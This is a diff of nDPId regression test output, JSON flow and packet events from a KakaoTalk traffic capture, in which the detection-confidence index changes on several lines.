01060{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1430069164656,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":498,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":498,"pkt_l4_len":462,"thread_ts_msec":1430069164656,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAeIKLkAAjgb4AIuWAH0KGFK8Abu3Y2Ij1H9RKASKUBifhj2IAAC2AQAA7+nGaLVdqRc+Gkt7POZ3izYarM8cfC\/oKc57w3ON8GY\/K1szNYS+6Yytrgv9fJ110+svPWy4JXfqhqsy8n\/Qi0EhBo8vKa7TtIo39CMQrfI1DyAke3OCHinKUbcE7JofE08wNW\/SYiLVq+ch1jInTJlBtTETD6sakW5t+\/pqslJuJu6FErHiOcJlRXUhJ\/w2UMRtIuPzDgq66Pu7iQ4cPuLk01HGBYGyY\/ec8L+8kz8C0iE6HOIH6YT0BKGthN3UTgwPbBq6O4DQcUiN2hgrUDIxq8uw9ZbWllzKNEYrEa8k7r3ZVHoPDQdXWrcQvhxam6oeYyK7V8McoNRiSIayjOQMTgXnysBnscEyik7me1vByK2C0l2He7bBFWQmrSmeZXMFh2H60fcsxZbAlEWK0siSqlB7jvAlTaG4udBSGXSTj4rEL2MZLSGqP2XF68ncz4+WzMi\/pNklQw9YyvrinQJFb3QOjkMePALF9ilvEQ+wMia1\/U8MBwJo9G9KKjVSCXjRCZRheUcgsdenusXElIUwOqnMT+7rwPfeomV3b9fbsOdbRa7VkQEi4icvvEwgda+Sg6Qy"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1430069164657,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069164657,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjTg0AAQAZ+ZQoYUryLlgB9t2MBu1EoBIpiI9Y5UBCiGOkBAAA="} @@ -33,26 +33,26 @@ 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1430069164966,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069164966,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADxKlUAAQAaV1AoYUrxuTI8y5ekjKS1pjaoAAAAAoAI2sFqBAAACBAV4BAIICgACxz8AAAAAAQMDBQ=="} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1430069165114,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069165114,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALgbyaW5MjzIKGFK8Iynl6dfwna4taY2roBI4kADPAAACBAV4BAIICkTbbpQAAsc\/AQMDCQ=="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1430069165115,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069165115,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADRKlkAAQAaV2woYUrxuTI8y5ekjKS1pjavX8J2vgBABtlp5AAABAQgKAALHTkTbbpQ="} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069164966,"flow_last_seen":1430069165129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069165129,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01497{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":58,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069164966,"flow_last_seen":1430069165314,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1430069165314,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"4ea82b75038dd27e8a1cb69d8b839b26","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","subjectDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","fingerprint":"65:88:37:51:01:AA:1F:12:E4:44:27:52:F9:32:FD:40:94:C1:08:D9"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069164966,"flow_last_seen":1430069165129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069165129,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01497{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":58,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069164966,"flow_last_seen":1430069165314,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1430069165314,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"4ea82b75038dd27e8a1cb69d8b839b26","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","subjectDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","fingerprint":"65:88:37:51:01:AA:1F:12:E4:44:27:52:F9:32:FD:40:94:C1:08:D9"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170090,"flow_last_seen":1430069170090,"flow_idle_time":7580000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069170090,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1430069170090,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":164,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":164,"pkt_l4_len":128,"thread_ts_msec":1430069170090,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAJSUaEAAQAZSqQoYUrytwki8h34UbGWkOWcyCtXvgBgB1zgmAAABAQgKAALJQHWhBxYXAwEAW9BJTUK7bhQDJS6M4k2xveYn3KZ2THpi3b2p1WnyM44nZ0651+YzJehbLb+jV4nNEd4GZbKLQU+P8abQYninXFhPSKcNuFppnDwsImxNyj3HrOvurwOWRZpYp3o="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170090,"flow_last_seen":1430069170090,"flow_idle_time":7580000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069170090,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170090,"flow_last_seen":1430069170090,"flow_idle_time":7580000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069170090,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170892,"flow_last_seen":1430069170892,"flow_idle_time":200000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1430069170892,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11321,"dst_port":23045,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1430069170892,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":122,"pkt_l4_len":86,"thread_ts_msec":1430069170892,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAGoAAEAAPxHbOAoYUrwByQGuLDlaBQBWgNSByQAHC4ZVGZBlh61hMGy+mVz7szeLE04wAIGpUs16HTnaFQo\/DwShnbgrVUo6QPfO7hnIEQI6Zble8vC3moejgAAAAXwPCk3m1v5lftk="} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170892,"flow_last_seen":1430069170892,"flow_idle_time":200000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1430069170892,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11321,"dst_port":23045,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170892,"flow_last_seen":1430069170892,"flow_idle_time":200000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1430069170892,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11321,"dst_port":23045,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170975,"flow_last_seen":1430069170975,"flow_idle_time":200000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1430069170975,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10269,"dst_port":23047,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1430069170975,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":122,"pkt_l4_len":86,"thread_ts_msec":1430069170975,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAGoAAEAAQBHaOAoYUrwByQGuKB1aBwBWSf6ByQAHVJql2hcYBvUW09\/cV2PnqW9IAC+tkcS3zbxHaXzNy97m1tMPsxdrmxKMjQTBocmvV+MtI4fyJpYC3zCcgAAAAaPWslm6g8tl\/I8="} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170975,"flow_last_seen":1430069170975,"flow_idle_time":200000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1430069170975,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10269,"dst_port":23047,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170975,"flow_last_seen":1430069170975,"flow_idle_time":200000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1430069170975,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10269,"dst_port":23047,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069171118,"flow_last_seen":1430069171118,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1430069171118,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11320,"dst_port":23044,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1430069171118,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":100,"pkt_l4_len":64,"thread_ts_msec":1430069171118,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAFQAAEAAPxHbTgoYUrwByQGuLDhaBABATCmA7E6yizmc2guGVRn+xfaQv+g9g3ccEnajV1GbM8MpJWVK2C77CAiJwDoJYkgGCqWuS2HWMkwGeQ=="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069171118,"flow_last_seen":1430069171118,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1430069171118,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11320,"dst_port":23044,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069171118,"flow_last_seen":1430069171118,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1430069171118,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11320,"dst_port":23044,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1430069171120,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":99,"pkt_l4_len":63,"thread_ts_msec":1430069171120,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAFMAAEAAPxHbTwoYUrwByQGuLDhaBAA\/C92AbE6zizmgmguGVRkt\/rZnfXpGz0N2A\/IfJpewUyMSY166JO1xGXdEkGNQd31ADIw6ZS3SDh9Y"} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1430069171120,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":99,"pkt_l4_len":63,"thread_ts_msec":1430069171120,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAFMAAEAAPxHbTwoYUrwByQGuLDhaBAA\/5SmAbE60izmkWguGVRmezvGSQL2r8\/lU9MEKvF6SC08uWokrFHcn2V7\/8UTxLNEjkf5mPRch1tsI"} 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1430069171127,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":122,"pkt_l4_len":86,"thread_ts_msec":1430069171127,"pkt":"AAACEgAAAAAAAAAAAAAIAEUoAGoAAEAAGxH\/EAHJAa4KGFK8WgUsOQBWReSByQAHVJql2hcYBvUW09\/cV2PnqW9IAC+tkcS3zbxHaXzNy97m1tMPsxdrmxKMjQTBocmvV+MtI4fyJpYC3zCcgAAAAaPWslm6g8tl\/I8="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069171389,"flow_last_seen":1430069171389,"flow_idle_time":200000,"flow_min_l4_payload_len":79,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":79,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1430069171389,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10268,"dst_port":23046,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1430069171389,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":123,"pkt_l4_len":87,"thread_ts_msec":1430069171389,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAGsAAEAAQBHaNwoYUrwByQGuKBxaBgBXWCuA7DE+fqkVA1Sapdp6cTmDebnhh8KUkQVLcfVIHO+KdE\/hh8TrsDi1pxsxiqViFSLVRYeZKeMWrEXQddUHKF8UZHmGznF9XlwFasBuVesU"} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069171389,"flow_last_seen":1430069171389,"flow_idle_time":200000,"flow_min_l4_payload_len":79,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":79,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1430069171389,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10268,"dst_port":23046,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069171389,"flow_last_seen":1430069171389,"flow_idle_time":200000,"flow_min_l4_payload_len":79,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":79,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1430069171389,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10268,"dst_port":23046,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00645{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1430069171425,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":192,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":192,"pkt_l4_len":156,"thread_ts_msec":1430069171425,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAALAAAEAAQBHZ8goYUrwByQGuKBxaBgCccR6AbDE\/fqkYw1SapdpQtIGDUUcsKy8FZc8SkcXbnkaLnkk7o+K31\/Lp8iVo3SBPJc3DyoRUtaFntc3koP5JLgEppFZXqNkw36nmYntuZ329GNTJ06T0XeyZJfDm34fzEotPLv3zEaM1kQ76cuJR6IF9rGbKT3sQKWcYIsd5M3XbqcXgkS4bFd8efSkCV9pxMGaMM2HU"} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1430069171464,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":115,"pkt_l4_len":79,"thread_ts_msec":1430069171464,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAGMAAEAAQBHaPwoYUrwByQGuKBxaBgBPG\/OAbDFAfqkcg1SapdrEmBFpbnVmJMblF0rZoL8vvV92uiSDpJJT7NfUzojI6pP2kn9ZuUksJi0oXTyacMa3Otx9PZKNJxznlw=="} 00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1430069171998,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":142,"pkt_l4_len":106,"thread_ts_msec":1430069171998,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAH4AAEAAPxHbJAoYUrwByQGuLDlaBQBqX6qByAAMC4ZVGUMDyNdZMqzZvFL5masXDZVA6JQCTSwYzII6r0J+H6ebHDpiG6\/AGpupgF2zzgl2ppSiLVPnYiD98U8UjOQ2fRfyw\/ugiovyQFT+lfaAAAACkQQ8eHVaWMSL\/A=="} @@ -60,7 +60,7 @@ 00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1430069172127,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":142,"pkt_l4_len":106,"thread_ts_msec":1430069172127,"pkt":"AAACEgAAAAAAAAAAAAAIAEUoAH4AAEAAGhH\/\/AHJAa4KGFK8WgcoHQBqY8SByAAMC4ZVGUMDyNdZMqzZvFL5masXDZVA6JQCTSwYzII6r0J+H6ebHDpiG6\/AGpupgF2zzgl2ppSiLVPnYiD98U8UjOQ2fRfyw\/ugiovyQFT+lfaAAAACkQQ8eHVaWMSL\/A=="} 